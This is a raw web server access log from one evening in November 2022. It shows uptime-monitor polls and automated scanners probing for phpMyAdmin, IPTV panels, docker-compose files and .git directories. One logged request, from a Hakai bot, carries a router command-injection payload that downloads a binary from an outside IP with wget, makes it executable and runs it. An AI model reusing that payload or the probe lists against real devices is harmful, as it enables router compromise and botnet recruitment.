185.122.204.30 - - [03/Nov/2022:19:06:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [03/Nov/2022:19:06:35 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [03/Nov/2022:19:06:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:07:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:08:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:09:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.222.125 - - [03/Nov/2022:19:10:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.222.125 - - [03/Nov/2022:19:10:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.222.125 - - [03/Nov/2022:19:10:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:10:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:11:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:12:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:13:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.101.12.124 - - [03/Nov/2022:19:14:43 +0100] "_]D\x92n\x1a\xaflR\xb8G\x84\x03\x16\r\xe5\xfd\x81\xb6" 400 329 "-" "-"
46.101.12.124 - - [03/Nov/2022:19:14:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
46.101.12.124 - - [03/Nov/2022:19:14:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
46.101.12.124 - - [03/Nov/2022:19:14:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:14:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:15:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:16:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.216.183.144 - - [03/Nov/2022:19:17:26 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:17:26 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:17:26 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:17:26 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:17:26 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:17:26 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:17:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.48.125 - - [03/Nov/2022:19:19:29 +0100] "GET /docker-compose.yml HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15"
212.91.246.72 - - [03/Nov/2022:19:19:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.48.125 - - [03/Nov/2022:19:20:30 +0100] "GET /docker-compose.yml HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
92.118.39.78 - - [03/Nov/2022:19:20:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:20:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:21:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:22:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:23:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:24:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:25:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [03/Nov/2022:19:26:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [03/Nov/2022:19:26:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Nov/2022:19:26:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Nov/2022:19:26:33 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [03/Nov/2022:19:26:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:27:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:28:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:29:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.246.178.130 - - [03/Nov/2022:19:30:27 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:30:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:31:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.216.183.144 - - [03/Nov/2022:19:32:00 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:32:00 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:32:00 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:32:00 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:32:00 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:32:00 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:32:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.101.175.16 - - [03/Nov/2022:19:33:21 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
46.101.175.16 - - [03/Nov/2022:19:33:21 +0100] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
46.101.175.16 - - [03/Nov/2022:19:33:21 +0100] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
46.101.175.16 - - [03/Nov/2022:19:33:21 +0100] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
46.101.175.16 - - [03/Nov/2022:19:33:21 +0100] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
46.101.175.16 - - [03/Nov/2022:19:33:21 +0100] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Roku/DVP-9.10 (289.10E04111A)"
46.101.175.16 - - [03/Nov/2022:19:33:21 +0100] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
46.101.175.16 - - [03/Nov/2022:19:33:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:19:33:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:34:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:35:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:36:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:37:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:38:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:39:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.216.183.144 - - [03/Nov/2022:19:40:28 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:40:28 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:40:28 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:40:28 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:40:28 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:40:28 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:40:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:41:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:42:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:43:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.92.129.12 - - [03/Nov/2022:19:44:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:19:44:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:45:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.97.176.184 - - [03/Nov/2022:19:45:51 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
209.97.176.184 - - [03/Nov/2022:19:45:51 +0100] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.97.176.184 - - [03/Nov/2022:19:45:51 +0100] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.97.176.184 - - [03/Nov/2022:19:45:51 +0100] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.97.176.184 - - [03/Nov/2022:19:45:51 +0100] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.97.176.184 - - [03/Nov/2022:19:45:51 +0100] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36"
209.97.176.184 - - [03/Nov/2022:19:45:52 +0100] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
209.97.176.184 - - [03/Nov/2022:19:45:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:19:46:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.216.183.144 - - [03/Nov/2022:19:47:06 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:06 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:06 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:06 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:06 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:06 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:35 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:35 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:35 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:35 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:35 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [03/Nov/2022:19:47:35 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:47:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:48:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /indice.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /inicio.aspx HTTP/1.1" 404 316 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /nmaplowercheck1667501351 HTTP/1.1" 404 329 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /home.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:11 +0100] "GET /main.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /start.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /DrBd HTTP/1.1" 404 309 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /base.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /localstart.php HTTP/1.1" 404 319 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /default.shtml HTTP/1.1" 404 318 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
195.96.137.4 - - [03/Nov/2022:19:49:12 +0100] "GET /start.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:13 +0100] "GET /base.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:13 +0100] "GET /indice.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:13 +0100] "GET /indice.aspx HTTP/1.1" 404 316 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:13 +0100] "GET /readme.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:13 +0100] "GET /main.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:13 +0100] "GET /default.asp HTTP/1.1" 404 316 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:14 +0100] "GET /menu.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
195.96.137.4 - - [03/Nov/2022:19:49:14 +0100] "GET default.asp HTTP/1.1" 400 333 "-" "curl/7.54.0"
109.145.247.47 - - [03/Nov/2022:19:49:19 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
195.96.137.4 - - [03/Nov/2022:19:49:21 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
195.96.137.4 - - [03/Nov/2022:19:49:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:49:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:50:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:51:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.96.137.4 - - [03/Nov/2022:19:51:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.227.254.54 - - [03/Nov/2022:19:52:35 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Nov/2022:19:52:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:53:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:54:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:55:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:56:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:57:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:58:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:19:59:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.64.203 - - [03/Nov/2022:20:00:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.64.203 - - [03/Nov/2022:20:00:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.64.203 - - [03/Nov/2022:20:00:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Nov/2022:20:00:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:01:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.166.51.28 - - [03/Nov/2022:20:01:58 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
188.166.51.28 - - [03/Nov/2022:20:01:58 +0100] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
188.166.51.28 - - [03/Nov/2022:20:01:58 +0100] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
188.166.51.28 - - [03/Nov/2022:20:01:58 +0100] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
188.166.51.28 - - [03/Nov/2022:20:01:58 +0100] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
188.166.51.28 - - [03/Nov/2022:20:01:58 +0100] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Roku/DVP-9.10 (289.10E04111A)"
188.166.51.28 - - [03/Nov/2022:20:01:58 +0100] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
188.166.51.28 - - [03/Nov/2022:20:01:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
